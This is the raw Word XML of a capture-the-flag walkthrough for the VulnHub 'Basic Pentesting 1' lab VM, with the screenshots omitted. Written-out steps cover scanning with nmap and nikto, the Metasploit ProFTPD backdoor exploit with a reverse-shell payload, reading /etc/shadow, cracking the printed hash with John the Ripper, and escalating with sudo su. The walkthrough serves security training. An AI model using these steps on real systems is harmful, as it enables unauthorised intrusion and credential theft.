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23C" w:rsidRDefault="0038185D">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002D323C">
        <w:instrText>https://www.vulnhub.com/entry/basic-pentesting-1,216/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="004C2520">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://www.vulnhub.com/entry/basic-pentesting-1,216/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00846409" w:rsidRDefault="00ED0AD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6D66AF" wp14:editId="190717ED">
            <wp:extent cx="5943600" cy="1609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39" w:rsidRDefault="00955639" w:rsidP="00955639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ED0AD9" w:rsidRDefault="00955639" w:rsidP="00955639">
      <w:r>
        <w:t xml:space="preserve">└─#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sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.21.133</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00955639" w:rsidRDefault="00B4033A" w:rsidP="00955639">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C640046" wp14:editId="5C38522C">
            <wp:extent cx="5191125" cy="2124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3A" w:rsidRDefault="00236725" w:rsidP="00955639">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00F051D1" w:rsidRPr="004C2520">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.133/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F051D1" w:rsidRDefault="000B11CB" w:rsidP="00955639">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E9E7DE1" wp14:editId="0A06C6FC">
            <wp:extent cx="5943600" cy="2359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CB" w:rsidRDefault="000B11CB" w:rsidP="00955639"/>
    <w:p w:rsidR="0006214C" w:rsidRDefault="0006214C" w:rsidP="00955639"/>
    <w:p w:rsidR="00953E93" w:rsidRDefault="00953E93" w:rsidP="00953E93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0B11CB" w:rsidRDefault="00953E93" w:rsidP="00953E93">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="004C2520">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.133</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00953E93" w:rsidRDefault="008E4DE2" w:rsidP="00953E93">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DC61357" wp14:editId="42F7D40B">
            <wp:extent cx="5943600" cy="1877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E2" w:rsidRDefault="008E4DE2" w:rsidP="00953E93"/>
    <w:p w:rsidR="008E4DE2" w:rsidRDefault="00236725" w:rsidP="00953E93">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00321997" w:rsidRPr="004C2520">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.133/secret/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00321997" w:rsidRDefault="00AC65EE" w:rsidP="00953E93">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B05A603" wp14:editId="798D60B0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A4" w:rsidRDefault="00C23D74" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="606FF2B0" wp14:editId="2968916B">
            <wp:extent cx="5943600" cy="2052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CB" w:rsidRDefault="00713BCB" w:rsidP="00494A41">
      <w:r w:rsidRPr="00713BCB">
        <w:t xml:space="preserve">msf6 &gt; search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00713BCB">
        <w:t>proftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00776442" w:rsidRDefault="008B6949" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="216F0A0F" wp14:editId="533DA268">
            <wp:extent cx="5943600" cy="1353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DB" w:rsidRDefault="00835CDB" w:rsidP="00494A41"/>
    <w:p w:rsidR="00835CDB" w:rsidRDefault="004C7483" w:rsidP="00494A41">
      <w:r w:rsidRPr="004C7483">
        <w:t>msf6 &gt; use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C7483">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C7483">
        <w:t>/ftp/proftpd_133c_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C7483" w:rsidRDefault="002E3606" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E241E11" wp14:editId="3D595C1A">
            <wp:extent cx="5943600" cy="1883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06" w:rsidRDefault="002E3606" w:rsidP="00494A41"/>
    <w:p w:rsidR="002E3606" w:rsidRDefault="000A4BC2" w:rsidP="00494A41">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A4BC2">
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A4BC2">
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A4BC2">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A4BC2">
        <w:t>/ftp/proftpd_133c_backdoor) &gt; set RHOSTS 192.168.21.133</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4BC2" w:rsidRDefault="00CE5A4F" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08EB734D" wp14:editId="1A0C52C0">
            <wp:extent cx="5743575" cy="619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4F" w:rsidRDefault="00CE5A4F" w:rsidP="00494A41"/>
    <w:p w:rsidR="00CE5A4F" w:rsidRDefault="00136385" w:rsidP="00494A41">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00136385">
        <w:lastRenderedPageBreak/>
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00136385">
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00136385">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00136385">
        <w:t>/ftp/proftpd_133c_backdoor) &gt; show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00136385" w:rsidRDefault="00F42A78" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D8A112" wp14:editId="7A203095">
            <wp:extent cx="5943600" cy="1543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78" w:rsidRDefault="00F42A78" w:rsidP="00494A41"/>
    <w:p w:rsidR="00F42A78" w:rsidRDefault="00D71638" w:rsidP="00494A41">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71638">
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D71638">
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71638">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71638">
        <w:t xml:space="preserve">/ftp/proftpd_133c_backdoor) &gt; set PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71638">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71638">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71638">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71638">
        <w:t>/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71638" w:rsidRDefault="00473320" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718038D9" wp14:editId="517901D6">
            <wp:extent cx="5943600" cy="25857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20" w:rsidRDefault="00473320" w:rsidP="00494A41"/>
    <w:p w:rsidR="00473320" w:rsidRDefault="00180F00" w:rsidP="00494A41">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00180F00">
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00180F00">
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180F00">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180F00">
        <w:t>/ftp/proftpd_133c_backdoor) &gt; set LHOST 192.168.21.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00180F00" w:rsidRDefault="008174A5" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CED5DA" wp14:editId="4F451D4C">
            <wp:extent cx="5562600" cy="60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A5" w:rsidRDefault="00C70035" w:rsidP="00494A41">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C70035">
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C70035">
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C70035">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C70035">
        <w:t>/ftp/proftpd_133c_backdoor) &gt; set LPORT 4445</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C70035" w:rsidRDefault="00831E3A" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A705031" wp14:editId="1F1804FC">
            <wp:extent cx="5943600" cy="20135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3A" w:rsidRDefault="00831E3A" w:rsidP="00494A41"/>
    <w:p w:rsidR="00831E3A" w:rsidRDefault="0088104B" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0597F9E7" wp14:editId="586B6EDB">
            <wp:extent cx="4505325" cy="781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4B" w:rsidRDefault="0088104B" w:rsidP="00494A41"/>
    <w:p w:rsidR="0088104B" w:rsidRDefault="00154351" w:rsidP="00494A41">
      <w:r w:rsidRPr="00154351">
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00154351">
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154351">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00154351">
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00154351">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00154351">
        <w:t>"/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00154351" w:rsidRDefault="000B072E" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66EDF0BE" wp14:editId="541D7B31">
            <wp:extent cx="4038600" cy="390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2E" w:rsidRDefault="00216EAB" w:rsidP="00494A41">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216EAB">
        <w:t>root@vtcsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216EAB">
        <w:t>:/# cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00216EAB">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00216EAB">
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00216EAB" w:rsidRDefault="002B782C" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D6CA85D" wp14:editId="4B63511E">
            <wp:extent cx="5943600" cy="41319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2C" w:rsidRDefault="00213312" w:rsidP="00494A41">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00213312" w:rsidRDefault="00213312" w:rsidP="00494A41">
      <w:r w:rsidRPr="00213312">
        <w:t>marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00213312">
        <w:t>:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="007C6648" w:rsidRDefault="007C6648" w:rsidP="00494A41"/>
    <w:p w:rsidR="007C6648" w:rsidRDefault="007C6648" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C1A6119" wp14:editId="4D049C9E">
            <wp:extent cx="5943600" cy="398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DC" w:rsidRDefault="004914DC" w:rsidP="004914DC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7C6648" w:rsidRDefault="004914DC" w:rsidP="004914DC">
      <w:r>
        <w:t>└─# john hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004914DC" w:rsidRDefault="00961837" w:rsidP="004914DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE4FB63" wp14:editId="2685EB0E">
            <wp:extent cx="5943600" cy="15284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37" w:rsidRDefault="00961837" w:rsidP="004914DC">
      <w:r>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
      <w:r w:rsidRPr="00961837">
        <w:t>marlinspike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D0364D" w:rsidRDefault="00D0364D" w:rsidP="00D0364D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961837" w:rsidRDefault="00D0364D" w:rsidP="00D0364D">
      <w:r>
        <w:t>└─# john --show hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00213312" w:rsidRDefault="00213312" w:rsidP="00494A41"/>
    <w:p w:rsidR="00D0364D" w:rsidRDefault="00D0364D" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44D27D72" wp14:editId="2D8A6E7A">
            <wp:extent cx="3381375" cy="876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A6" w:rsidRDefault="007264A6" w:rsidP="007264A6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D0364D" w:rsidRDefault="007264A6" w:rsidP="007264A6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26" w:history="1">
        <w:r w:rsidRPr="004C2520">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>marlinspike@192.168.21.133</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007264A6" w:rsidRDefault="00DC24E9" w:rsidP="007264A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="693DB9CE" wp14:editId="75FE8264">
            <wp:extent cx="5943600" cy="40728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E9" w:rsidRDefault="00C93EA5" w:rsidP="007264A6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C93EA5">
        <w:t>marlinspike@vtcsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C93EA5">
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C93EA5">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C93EA5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C93EA5">
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C93EA5" w:rsidRDefault="00D032E9" w:rsidP="007264A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EA33BF0" wp14:editId="52474FE6">
            <wp:extent cx="2962275" cy="523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37" w:rsidRDefault="00793099" w:rsidP="00494A41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0146FDD9" wp14:editId="7CAF2065">
            <wp:extent cx="1724025" cy="361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3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6C8"/>
    <w:rsid w:val="0006214C"/>
    <w:rsid w:val="000779A4"/>
    <w:rsid w:val="000A4BC2"/>
    <w:rsid w:val="000B072E"/>
    <w:rsid w:val="000B11CB"/>
    <w:rsid w:val="000B36CF"/>
    <w:rsid w:val="00136385"/>
    <w:rsid w:val="00154351"/>
    <w:rsid w:val="00180F00"/>
    <w:rsid w:val="00213312"/>
    <w:rsid w:val="00216EAB"/>
    <w:rsid w:val="00236725"/>
    <w:rsid w:val="002B782C"/>
    <w:rsid w:val="002D323C"/>
    <w:rsid w:val="002D7FD2"/>
    <w:rsid w:val="002E3606"/>
    <w:rsid w:val="00321997"/>
    <w:rsid w:val="0038185D"/>
    <w:rsid w:val="003D0A22"/>
    <w:rsid w:val="003D16C8"/>
    <w:rsid w:val="00473320"/>
    <w:rsid w:val="004914DC"/>
    <w:rsid w:val="00494A41"/>
    <w:rsid w:val="004B1017"/>
    <w:rsid w:val="004C7483"/>
    <w:rsid w:val="005B07D3"/>
    <w:rsid w:val="005C7F74"/>
    <w:rsid w:val="00685534"/>
    <w:rsid w:val="00713BCB"/>
    <w:rsid w:val="007264A6"/>
    <w:rsid w:val="00776442"/>
    <w:rsid w:val="00793099"/>
    <w:rsid w:val="007C6648"/>
    <w:rsid w:val="008174A5"/>
    <w:rsid w:val="00831E3A"/>
    <w:rsid w:val="00835CDB"/>
    <w:rsid w:val="00846409"/>
    <w:rsid w:val="0088104B"/>
    <w:rsid w:val="008861EB"/>
    <w:rsid w:val="008B6949"/>
    <w:rsid w:val="008E4DE2"/>
    <w:rsid w:val="00953E93"/>
    <w:rsid w:val="00955639"/>
    <w:rsid w:val="00961837"/>
    <w:rsid w:val="00991ED5"/>
    <w:rsid w:val="009B4047"/>
    <w:rsid w:val="009F22EE"/>
    <w:rsid w:val="00AA4D29"/>
    <w:rsid w:val="00AC65EE"/>
    <w:rsid w:val="00AE5DC0"/>
    <w:rsid w:val="00B4033A"/>
    <w:rsid w:val="00BD082B"/>
    <w:rsid w:val="00C23D74"/>
    <w:rsid w:val="00C70035"/>
    <w:rsid w:val="00C93EA5"/>
    <w:rsid w:val="00CE5A4F"/>
    <w:rsid w:val="00D032E9"/>
    <w:rsid w:val="00D0364D"/>
    <w:rsid w:val="00D71638"/>
    <w:rsid w:val="00DB5779"/>
    <w:rsid w:val="00DC24E9"/>
    <w:rsid w:val="00EA3937"/>
    <w:rsid w:val="00ED0AD9"/>
    <w:rsid w:val="00F051D1"/>
    <w:rsid w:val="00F42A78"/>
    <w:rsid w:val="00FE0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47E6AE-CCC7-485C-A472-0BA636422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64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21.133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mailto:marlinspike@192.168.21.133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192.168.21.133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hyperlink" Target="http://192.168.21.133/secret/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96</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-26T06:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-30T14:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>